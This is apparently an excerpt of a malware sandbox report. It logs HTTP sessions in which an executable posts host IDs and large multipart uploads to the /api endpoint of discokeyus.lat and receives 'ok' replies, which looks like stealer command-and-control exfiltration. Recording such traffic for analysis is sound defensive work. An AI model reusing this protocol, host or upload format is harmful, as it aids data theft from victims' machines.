                                                                                                                                  2024-12-20 16:05:42 UTC1369INData Raw: 79 4e 58 66 6a 4f 79 62 58 52 69 6e 46 67 6a 6a 44 6d 52 6f 6b 68 4e 47 4f 7a 38 41 46 49 53 52 38 42 4b 71 45 37 7a 4d 78 68 37 5a 67 41 2f 45 36 52 6b 59 58 32 44 64 79 4f 4d 63 59 62 6c 55 41 6b 61 37 62 70 55 47 42 70 53 79 6b 6d 79 42 37 70 39 45 47 41 30 57 58 49 35 70 6e 68 38 62 34 6c 61 4b 49 77 33 6d 4b 35 44 52 52 72 6b 38 51 4e 55 55 77 36 4f 51 37 68 4f 35 54 4d 78 61 44 56 50 66 44 79 2f 61 57 67 72 6b 52 67 33 77 7a 61 56 36 78 45 4a 48 75 72 78 43 46 67 66 51 4d 70 4a 6f 42 79 79 64 42 68 71 4c 55 70 31 4e 62 4e 30 65 32 43 42 55 44 79 50 50 34 75 75 57 31 74 64 72 37 6f 4c 51 46 4d 59 6a 6e 4b 6e 48 71 31 77 58 56 49 77 57 32 6b 35 75 58 4d 7a 64 4d 42 50 62 6f 51 39 32 66 4d 4a 54 78 4c 6f 2b 51 4e 5a 47 6b 7a 44 51 61 6b 4c 76 48 55 62
                                                                                                                                  Data Ascii: yNXfjOybXRinFgjjDmRokhNGOz8AFISR8BKqE7zMxh7ZgA/E6RkYX2DdyOMcYblUAka7bpUGBpSykmyB7p9EGA0WXI5pnh8b4laKIw3mK5DRRrk8QNUUw6OQ7hO5TMxaDVPfDy/aWgrkRg3wzaV6xEJHurxCFgfQMpJoByydBhqLUp1NbN0e2CBUDyPP4uuW1tdr7oLQFMYjnKnHq1wXVIwW2k5uXMzdMBPboQ92fMJTxLo+QNZGkzDQakLvHUb
                                                                                                                                  2024-12-20 16:05:42 UTC1369INData Raw: 77 70 39 47 41 39 63 73 35 52 49 73 4e 70 32 61 68 4f 53 68 7a 72 38 77 42 58 46 45 54 63 54 71 63 63 76 48 49 55 62 69 70 59 63 6a 2b 2b 66 6e 70 6d 67 6c 73 70 68 44 36 63 36 77 63 4a 47 76 6d 36 56 42 67 79 54 63 56 49 2b 31 54 39 62 46 46 36 5a 6c 39 7a 63 75 77 2f 63 32 47 4c 58 43 4f 41 50 70 71 35 53 45 38 50 34 66 63 47 53 68 6c 4c 79 30 6d 74 41 37 35 31 47 57 67 71 53 6e 59 79 74 33 51 7a 4a 63 35 52 4e 73 4e 70 32 59 68 65 58 78 66 6d 39 68 70 54 45 6b 50 59 53 62 42 4f 38 7a 4d 4f 5a 44 63 59 4a 79 53 6b 61 48 52 30 77 45 39 75 68 44 33 5a 38 77 6c 50 46 4f 66 39 43 6c 59 42 52 63 68 4c 72 77 65 30 64 78 64 67 4a 6c 78 37 4e 62 46 38 66 32 43 4a 56 53 47 48 4f 4a 65 69 52 67 6c 54 6f 66 30 55 47 45 73 41 37 31 2b 6a 41 72 41 7a 41 43 30 2f 47
                                                                                                                                  Data Ascii: wp9GA9cs5RIsNp2ahOShzr8wBXFETcTqccvHIUbipYcj++fnpmglsphD6c6wcJGvm6VBgyTcVI+1T9bFF6Zl9zcuw/c2GLXCOAPpq5SE8P4fcGShlLy0mtA751GWgqSnYyt3QzJc5RNsNp2YheXxfm9hpTEkPYSbBO8zMOZDcYJySkaHR0wE9uhD3Z8wlPFOf9ClYBRchLrwe0dxdgJlx7NbF8f2CJVSGHOJeiRglTof0UGEsA71+jArAzAC0/G
                                                                                                                                  2024-12-20 16:05:42 UTC1369INData Raw: 34 61 79 76 57 46 67 36 49 4a 35 79 73 58 77 73 6f 34 76 51 43 58 77 55 41 30 58 76 75 54 72 4a 70 58 7a 73 66 51 54 38 31 75 44 38 72 4b 35 74 52 4c 6f 51 72 6a 36 78 46 57 42 62 73 39 69 35 58 46 46 62 4e 53 36 4d 66 74 44 38 55 62 6d 59 57 50 7a 57 73 50 79 73 72 6f 56 45 34 67 42 36 61 75 6b 41 4a 55 36 48 39 47 68 68 4c 41 50 41 45 73 67 32 74 63 42 42 79 47 42 67 6e 4b 34 6f 2f 65 48 32 4a 52 69 32 56 4f 70 53 6e 57 48 64 64 75 61 35 65 43 6b 45 53 6e 46 76 67 45 59 49 39 58 32 4a 6d 41 45 59 72 39 47 6b 7a 4d 39 77 59 62 70 46 78 77 65 73 4f 53 67 2f 7a 2f 41 39 4f 45 41 66 77 65 6f 63 59 74 33 51 50 5a 44 46 58 50 33 7a 30 63 44 4d 7a 74 78 59 6e 68 43 71 49 76 55 52 5a 47 71 48 46 51 68 67 4c 41 4a 59 45 6c 51 32 7a 66 52 68 31 4e 78 56 59 4a 4c
                                                                                                                                  Data Ascii: 4ayvWFg6IJ5ysXwso4vQCXwUA0XvuTrJpXzsfQT81uD8rK5tRLoQrj6xFWBbs9i5XFFbNS6MftD8UbmYWPzWsPysroVE4gB6aukAJU6H9GhhLAPAEsg2tcBByGBgnK4o/eH2JRi2VOpSnWHddua5eCkESnFvgEYI9X2JmAEYr9GkzM9wYbpFxwesOSg/z/A9OEAfweocYt3QPZDFXP3z0cDMztxYnhCqIvURZGqHFQhgLAJYElQ2zfRh1NxVYJL
                                                                                                                                  2024-12-20 16:05:42 UTC1369INData Raw: 73 46 63 6a 6a 48 32 58 6f 45 6c 4f 44 66 66 68 51 46 41 51 57 74 52 36 6e 69 57 78 64 52 68 35 49 56 35 5a 45 76 51 78 4d 32 54 4f 44 68 66 44 65 64 6d 55 42 77 6b 46 6f 61 4a 4d 62 52 42 4f 77 45 4f 32 48 2f 42 62 50 46 6b 63 47 6c 4d 31 6f 54 31 48 62 4a 35 48 4a 59 34 39 32 65 55 4a 54 31 32 35 71 6b 49 59 46 31 47 4f 48 50 42 63 35 69 5a 4d 4e 48 59 4b 59 48 79 74 50 32 55 72 31 67 52 67 77 79 50 5a 38 77 6b 4f 48 76 50 6f 43 6c 73 46 51 34 6c 36 6e 69 6d 7a 64 42 35 31 4e 6b 39 77 44 49 70 71 63 47 57 41 55 54 69 53 63 64 66 72 52 67 6c 46 32 4c 70 45 47 43 77 4f 6a 6c 7a 67 56 76 31 47 48 47 30 6f 58 32 6b 6a 2b 56 68 39 62 49 39 41 50 70 51 2b 32 65 55 4a 54 31 32 35 71 45 49 59 46 31 47 4f 48 50 42 63 35 69 5a 4d 4e 48 59 4b 59 48 79 74 50 32 55
                                                                                                                                  Data Ascii: sFcjjH2XoElODffhQFAQWtR6niWxdRh5IV5ZEvQxM2TODhfDedmUBwkFoaJMbRBOwEO2H/BbPFkcGlM1oT1HbJ5HJY492eUJT125qkIYF1GOHPBc5iZMNHYKYHytP2Ur1gRgwyPZ8wkOHvPoClsFQ4l6nimzdB51Nk9wDIpqcGWAUTiScdfrRglF2LpEGCwOjlzgVv1GHG0oX2kj+Vh9bI9APpQ+2eUJT125qEIYF1GOHPBc5iZMNHYKYHytP2U
                                                                                                                                  2024-12-20 16:05:42 UTC1369INData Raw: 6f 34 2b 6e 75 6c 70 54 67 76 69 75 6b 49 59 48 77 43 57 42 4b 45 45 72 58 34 51 5a 47 70 66 5a 54 58 30 4d 54 4e 6c 7a 67 35 75 67 6a 75 4a 70 6b 5a 4f 55 65 66 30 41 68 67 4d 44 74 63 45 74 6b 37 6c 49 46 45 6a 4e 42 67 6e 63 76 4e 38 59 58 6d 49 56 54 69 41 64 71 65 56 5a 46 73 61 38 66 6c 4f 61 52 35 45 32 46 47 6a 48 72 70 4e 49 55 34 30 58 32 38 78 39 6b 35 6c 61 49 35 59 4b 63 4e 2f 32 62 4d 4a 45 56 33 4d 36 41 74 49 45 41 43 41 42 4b 78 4f 35 54 4d 53 63 53 46 49 66 48 36 7a 5a 58 51 72 6b 52 67 33 77 79 66 5a 38 78 6f 48 58 66 4f 36 56 42 68 55 54 73 4e 46 6f 77 43 2b 59 51 31 6c 4a 55 35 38 64 59 70 42 58 6e 6d 4a 52 69 33 42 41 4a 53 76 58 31 77 65 38 66 30 79 5a 6a 35 53 79 56 53 6a 54 4a 46 30 45 6d 38 59 5a 6b 67 6a 73 32 38 78 54 59 31 41
                                                                                                                                  Data Ascii: o4+nulpTgviukIYHwCWBKEErX4QZGpfZTX0MTNlzg5ugjuJpkZOUef0AhgMDtcEtk7lIFEjNBgncvN8YXmIVTiAdqeVZFsa8flOaR5E2FGjHrpNIU40X28x9k5laI5YKcN/2bMJEV3M6AtIEACABKxO5TMScSFIfH6zZXQrkRg3wyfZ8xoHXfO6VBhUTsNFowC+YQ1lJU58dYpBXnmJRi3BAJSvX1we8f0yZj5SyVSjTJF0Em8YZkgjs28xTY1A


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.749706172.67.197.1704434208C:\Users\user\Desktop\zhQFKte2vX.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-20 16:05:44 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=5QXR01HVP5LF9RR6L2B
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 12850
                                                                                                                                  Host: discokeyus.lat
                                                                                                                                  2024-12-20 16:05:44 UTC12850OUTData Raw: 2d 2d 35 51 58 52 30 31 48 56 50 35 4c 46 39 52 52 36 4c 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 51 58 52 30 31 48 56 50 35 4c 46 39 52 52 36 4c 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 51 58 52 30 31 48 56 50 35 4c 46 39 52 52 36 4c 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                  Data Ascii: --5QXR01HVP5LF9RR6L2BContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--5QXR01HVP5LF9RR6L2BContent-Disposition: form-data; name="pid"2--5QXR01HVP5LF9RR6L2BContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                  2024-12-20 16:05:45 UTC1141INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 20 Dec 2024 16:05:45 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=b5t0kqkfqc1t74fi1ahbd9msj7; expires=Tue, 15 Apr 2025 09:52:24 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2BQ59XTg5L5nUkbTdofqCdoSMNQvY%2Fafi4Ek%2BPT%2FYPFktZ6xvlPW8YRs%2F0Au7Zma3beLLYppKtkoDaBXsEGPl%2BU5NObr2kA64e4gII8ETl2A4Af%2B%2FcbXGgP4nyQBs%2Ff6eQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f50e02b5b8c4337-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1684&rtt_var=640&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13789&delivery_rate=1698662&cwnd=222&unsent_bytes=0&cid=425575ade6693dce&ts=1187&x=0"
                                                                                                                                  2024-12-20 16:05:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-20 16:05:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.749707172.67.197.1704434208C:\Users\user\Desktop\zhQFKte2vX.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-20 16:05:47 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=SJYCOTWQ7D4WOJWAAFB
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 15082
                                                                                                                                  Host: discokeyus.lat
                                                                                                                                  2024-12-20 16:05:47 UTC15082OUTData Raw: 2d 2d 53 4a 59 43 4f 54 57 51 37 44 34 57 4f 4a 57 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 4a 59 43 4f 54 57 51 37 44 34 57 4f 4a 57 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 4a 59 43 4f 54 57 51 37 44 34 57 4f 4a 57 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                  Data Ascii: --SJYCOTWQ7D4WOJWAAFBContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--SJYCOTWQ7D4WOJWAAFBContent-Disposition: form-data; name="pid"2--SJYCOTWQ7D4WOJWAAFBContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                  2024-12-20 16:05:48 UTC1133INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 20 Dec 2024 16:05:48 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=ngpue2rca2qr5kej9acs4fqcbt; expires=Tue, 15 Apr 2025 09:52:26 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xNryH63ijPpwVMBwHzPgUf8ClWlQAJ6wCvV%2B4lNCm393T%2FteKg9OIXh0yKfKx7hyZmP%2FaHsDxeFasqVr38HOe3a%2FXJPmp9bU4SDtLmmPmS%2BIkMMwbKyprmpLZlCcdBsxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f50e03b2d998c05-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1795&rtt_var=691&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2833&recv_bytes=16021&delivery_rate=1564844&cwnd=215&unsent_bytes=0&cid=90c984f281120bcf&ts=978&x=0"
                                                                                                                                  2024-12-20 16:05:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-20 16:05:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.749709172.67.197.1704434208C:\Users\user\Desktop\zhQFKte2vX.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-20 16:05:49 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=ERVH1N0HJQ8CFI
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 20377
                                                                                                                                  Host: discokeyus.lat
                                                                                                                                  2024-12-20 16:05:49 UTC15331OUTData Raw: 2d 2d 45 52 56 48 31 4e 30 48 4a 51 38 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 52 56 48 31 4e 30 48 4a 51 38 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 52 56 48 31 4e 30 48 4a 51 38 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 52 56 48 31 4e 30 48
                                                                                                                                  Data Ascii: --ERVH1N0HJQ8CFIContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--ERVH1N0HJQ8CFIContent-Disposition: form-data; name="pid"3--ERVH1N0HJQ8CFIContent-Disposition: form-data; name="lid"PsFKDg--pablo--ERVH1N0H
                                                                                                                                  2024-12-20 16:05:49 UTC5046OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                  2024-12-20 16:05:51 UTC1134INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 20 Dec 2024 16:05:51 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=hjcehs4vbm7245m4pm2vl4127t; expires=Tue, 15 Apr 2025 09:52:30 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W%2BoQwjy3NQoqHz%2Bu8P%2Bo42I9kgTal7IhjyP6gDtqkZ7V2DsFmhl2E3Uo6%2BQNZ2kyWb3CClQvsSoH8ixVHuzPfi4gXvEa4PswVZ%2FGRphRhNGLBWG5Tsh9osrqsPBc7FertQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f50e04a58e60f8f-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1661&rtt_var=642&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21333&delivery_rate=1681059&cwnd=232&unsent_bytes=0&cid=94fac26db648e246&ts=1886&x=0"
                                                                                                                                  2024-12-20 16:05:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-20 16:05:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.749712172.67.197.1704434208C:\Users\user\Desktop\zhQFKte2vX.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-20 16:05:53 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=Z384R315D
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 1171
                                                                                                                                  Host: discokeyus.lat
                                                                                                                                  2024-12-20 16:05:53 UTC1171OUTData Raw: 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 33 38 34 52 33 31 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                  Data Ascii: --Z384R315DContent-Disposition: form-data; name="hwid"35A1FBC046495DFCAC8923850305D13E--Z384R315DContent-Disposition: form-data; name="pid"1--Z384R315DContent-Disposition: form-data; name="lid"PsFKDg--pablo--Z384R315DContent-Disp
                                                                                                                                  2024-12-20 16:05:54 UTC1127INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 20 Dec 2024 16:05:54 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=6ati7qvk633ko2kk6hgdnefh2r; expires=Tue, 15 Apr 2025 09:52:33 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKLenlW%2B50sG%2BzZXoTPaOsr4XVQmYN5ZDrDPa7DKI86NSQf9y7dL6A2ynGZ4D9orE0uTL19WcUqoqzIEhRwAvoUbBfgO3yb2MFdzHzTtWmichnf3TJ%2FgfFq4tdXHhtMw7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f50e0611c3b78db-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1970&rtt_var=749&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2077&delivery_rate=1450571&cwnd=237&unsent_bytes=0&cid=bbd788aa3414a79f&ts=1698&x=0"
                                                                                                                                  2024-12-20 16:05:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-20 16:05:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.749713172.67.197.1704434208C:\Users\user\Desktop\zhQFKte2vX.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-20 16:05:56 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=V2B0YK8QWEUAT
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 551360
                                                                                                                                  Host: discokeyus.lat
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 2d 2d 56 32 42 30 59 4b 38 51 57 45 55 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 41 31 46 42 43 30 34 36 34 39 35 44 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 32 42 30 59 4b 38 51 57 45 55 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 32 42 30 59 4b 38 51 57 45 55 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 32 42 30 59 4b 38 51 57 45 55
